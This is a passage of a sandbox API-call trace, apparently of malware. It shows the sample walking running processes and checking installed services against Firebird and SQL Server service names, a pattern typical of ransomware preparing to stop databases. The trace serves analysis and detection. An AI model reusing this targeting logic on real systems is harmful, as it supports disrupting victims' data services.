lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0207.374] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0207.374] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0207.375] lstrlenW (lpString="state.exe") returned 9 [0207.375] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0207.376] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0207.376] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.377] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0207.377] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0207.378] lstrlenW (lpString="taskhostw.exe") returned 13 [0207.378] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0207.379] lstrlenW (lpString="sppsvc.exe") returned 10 [0207.379] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.380] lstrlenW (lpString="svchost.exe") returned 11 [0207.380] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0207.381] lstrlenW (lpString="Pg.exe") returned 6 [0207.382] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0207.383] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0207.383] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0207.384] lstrlenW (lpString="conhost.exe") returned 11 [0207.384] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0207.385] lstrlenW (lpString="cmd.exe") returned 7 [0207.385] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0207.386] lstrlenW (lpString="conhost.exe") returned 11 [0207.386] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0207.387] CloseHandle (hObject=0x3dc) returned 1 [0207.387] Sleep (dwMilliseconds=0x1f4) [0208.555] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bbe8 [0208.557] EnumServicesStatusExW (in: hSCManager=0x236bbe8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0208.557] GetLastError () returned 0xea [0208.557] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x4811068 [0208.558] EnumServicesStatusExW (in: hSCManager=0x236bbe8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4811068, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4811068, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0208.558] CloseServiceHandle (hSCObject=0x236bbe8) returned 1 [0208.559] lstrlenW (lpString="Appinfo") returned 7 [0208.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0208.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0208.559] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0208.559] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0208.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0208.559] lstrlenW (lpString="AppXSvc") returned 7 [0208.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0208.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0208.559] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0208.559] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0208.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0208.559] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0208.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0208.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0208.560] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0208.560] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0208.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0208.560] lstrlenW (lpString="Audiosrv") returned 8 [0208.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0208.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0208.560] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0208.560] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0208.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0208.560] lstrlenW (lpString="BFE") returned 3 [0208.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0208.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0208.560] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0208.560] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0208.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0208.560] lstrlenW (lpString="BITS") returned 4 [0208.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0208.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0208.863] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0208.864] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0208.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0208.864] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0208.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0208.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0208.864] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0208.864] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0208.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0208.864] lstrlenW (lpString="CDPSvc") returned 6 [0208.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0208.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0208.864] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0208.864] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0208.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0208.864] lstrlenW (lpString="ClickToRunSvc") returned 13 [0208.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0208.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0208.864] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0208.864] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0208.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0208.864] lstrlenW (lpString="ClipSVC") returned 7 [0208.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0208.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0208.864] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0208.864] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0208.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0208.864] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0208.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0208.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0208.864] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0208.865] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0208.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0208.865] lstrlenW (lpString="CryptSvc") returned 8 [0208.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0208.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0208.865] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0208.865] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0208.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0208.865] lstrlenW (lpString="DcomLaunch") returned 10 [0208.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0208.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0208.865] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0208.865] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0208.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0208.865] lstrlenW (lpString="DeviceAssociationService") returned 24 [0208.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0208.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0208.865] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0208.865] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0208.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0208.865] lstrlenW (lpString="Dhcp") returned 4 [0208.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0208.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0208.865] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0208.865] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0208.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0208.865] lstrlenW (lpString="Dnscache") returned 8 [0208.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0208.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0208.865] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0208.865] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0208.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0208.866] lstrlenW (lpString="DoSvc") returned 5 [0208.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0208.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0208.866] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0208.866] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0208.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0208.866] lstrlenW (lpString="DPS") returned 3 [0208.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0208.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0208.866] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0208.866] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0208.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0208.866] lstrlenW (lpString="DusmSvc") returned 7 [0208.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0208.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0208.866] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0208.866] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0208.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0208.866] lstrlenW (lpString="EventLog") returned 8 [0208.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0208.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0208.866] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0208.866] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0208.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0208.866] lstrlenW (lpString="EventSystem") returned 11 [0208.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0208.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0208.866] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0208.866] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0208.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0208.867] lstrlenW (lpString="FontCache") returned 9 [0208.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0208.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0208.867] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0208.867] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0208.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0208.867] lstrlenW (lpString="gpsvc") returned 5 [0208.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0208.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0208.867] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0208.867] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0208.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0208.867] lstrlenW (lpString="iphlpsvc") returned 8 [0208.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0208.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0208.867] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0208.867] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0208.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0208.867] lstrlenW (lpString="KeyIso") returned 6 [0208.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0208.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0208.867] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0208.893] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0208.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0208.893] lstrlenW (lpString="LanmanServer") returned 12 [0208.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0208.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0208.893] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0208.893] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0208.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0208.893] lstrlenW (lpString="LanmanWorkstation") returned 17 [0208.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0208.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0208.893] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0208.893] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0208.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0208.893] lstrlenW (lpString="lfsvc") returned 5 [0208.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0208.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0208.893] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0208.894] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0208.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0208.894] lstrlenW (lpString="LicenseManager") returned 14 [0208.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0208.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0208.894] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0208.894] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0208.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0208.894] lstrlenW (lpString="lmhosts") returned 7 [0208.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0208.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0208.894] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0208.894] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0208.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0208.894] lstrlenW (lpString="LSM") returned 3 [0208.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0208.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0208.894] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0208.894] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0208.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0208.894] lstrlenW (lpString="MpsSvc") returned 6 [0208.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0208.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0208.894] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0208.894] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0208.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0208.894] lstrlenW (lpString="NcbService") returned 10 [0208.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0208.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0208.894] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0208.894] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0208.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0208.895] lstrlenW (lpString="netprofm") returned 8 [0208.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0208.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0208.895] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0208.895] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0208.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0208.895] lstrlenW (lpString="NlaSvc") returned 6 [0208.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0208.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0208.895] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0208.895] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0208.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0208.895] lstrlenW (lpString="nsi") returned 3 [0208.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0208.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0208.895] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0208.895] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0208.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0208.895] lstrlenW (lpString="PcaSvc") returned 6 [0208.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0208.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0208.895] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0208.895] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0208.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0208.895] lstrlenW (lpString="PlugPlay") returned 8 [0208.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0208.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0208.895] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0208.895] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0208.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0208.895] lstrlenW (lpString="Power") returned 5 [0208.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0208.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0208.896] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0208.896] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0208.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0208.896] lstrlenW (lpString="ProfSvc") returned 7 [0208.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0208.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0208.896] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0208.896] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0208.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0208.896] lstrlenW (lpString="RpcEptMapper") returned 12 [0208.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0208.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0208.896] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0208.896] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0208.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0208.896] lstrlenW (lpString="RpcSs") returned 5 [0208.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0208.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0208.896] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0208.896] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0208.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0208.896] lstrlenW (lpString="SamSs") returned 5 [0208.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0208.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0208.896] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0208.896] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0208.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0208.896] lstrlenW (lpString="Schedule") returned 8 [0208.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0208.896] lstrcmpiW 